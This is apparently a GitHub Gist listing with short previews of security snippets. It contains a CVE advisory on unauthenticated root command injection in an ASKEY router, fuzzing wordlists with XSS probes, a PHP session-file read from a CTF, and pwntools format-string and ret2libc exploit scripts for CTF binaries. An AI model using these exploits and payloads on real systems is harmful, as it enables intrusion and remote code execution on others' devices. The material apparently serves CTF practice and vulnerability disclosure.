Skip to content

Instantly share code, notes, and snippets.

View CVE-2020–28695.txt
Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter
------------------------------------------------------------------------------
The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below.
if (iVar1 != 0) {
system("killall ping traceroute > /dev/null 2>&1");
__format = "ping %s -c %s -I %s> %s&";
puVar4 = auStack10144;
View parameters_h1.txt
-
.
..
...
....
.AMRU
.json
.onion
.txt
0
View subdomains_h1.txt
$$
$Any$
$shop$
$your-shop$
%20%44omain%20%3d
%2f%2f%2fbing
%60x
%domain%
%user%
%your_domain%
View paths_h1.txt
Set-Cookie=test=test
"--><svg
"><script>prompt("exr")<
$
$1
$a
$account_id
$code
View solve_doots.txt
payload :
%!/var/lib/php/sessions/sess_t4655hebsafr291praeif7gih2 f
.--------------------------------------------------------------------------------------------f
/var/lib/php/sessions/sess_t4655hebsafr291praeif7gih2 :
flag|s:71:"CTF-BR{1s_th1s_4_0day?1_r34lly_d0nt_know.Pl34s3_c0m3_pl4y_Pwn2Win_CTF!}";name|s:5:"'$.-)";
View exploit_echoback.py
from pwn import *
#p = process("./echoback")
p = remote("2018shell.picoctf.com",37402)
e = ELF("./echoback")
print p.recv(1024)
payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte')
print len(payload)
View unix_commands.txt
2to3-2.7
X11
[
ab
aclocal
aclocal-1.15
addpart
addr2line
appres
apropos
View food
cat=1;food=1;exit=1;{cat,food};{exit,1}
1//1;print(open("food","r").read());"""
var fs = require('fs');fs.readFile('food','utf8',function(err,contents){
console.log(contents)})//"""
View exploit_1.py
from pwn import *
p = process("./examine32")
system = 0xf7e19e70
exit = 0xf7e0cf50
bash = 0xf7f39fcc
offset = ???
exploit = "A"*offset+p32(system)+p32(exit)+p32(bash)+"\xff"
View examine_main.c
int main(int argc, char *argv[]) {
int i;
char s[MAX_CMD_LINE], c;
memset(s, 0, MAX_CMD_LINE);
// Loop until Ctrl+C is pressed
for (i=0; ; i++) {
if ((c = getchar()) == EOF) // End Of File reached when reading from a pipe
break;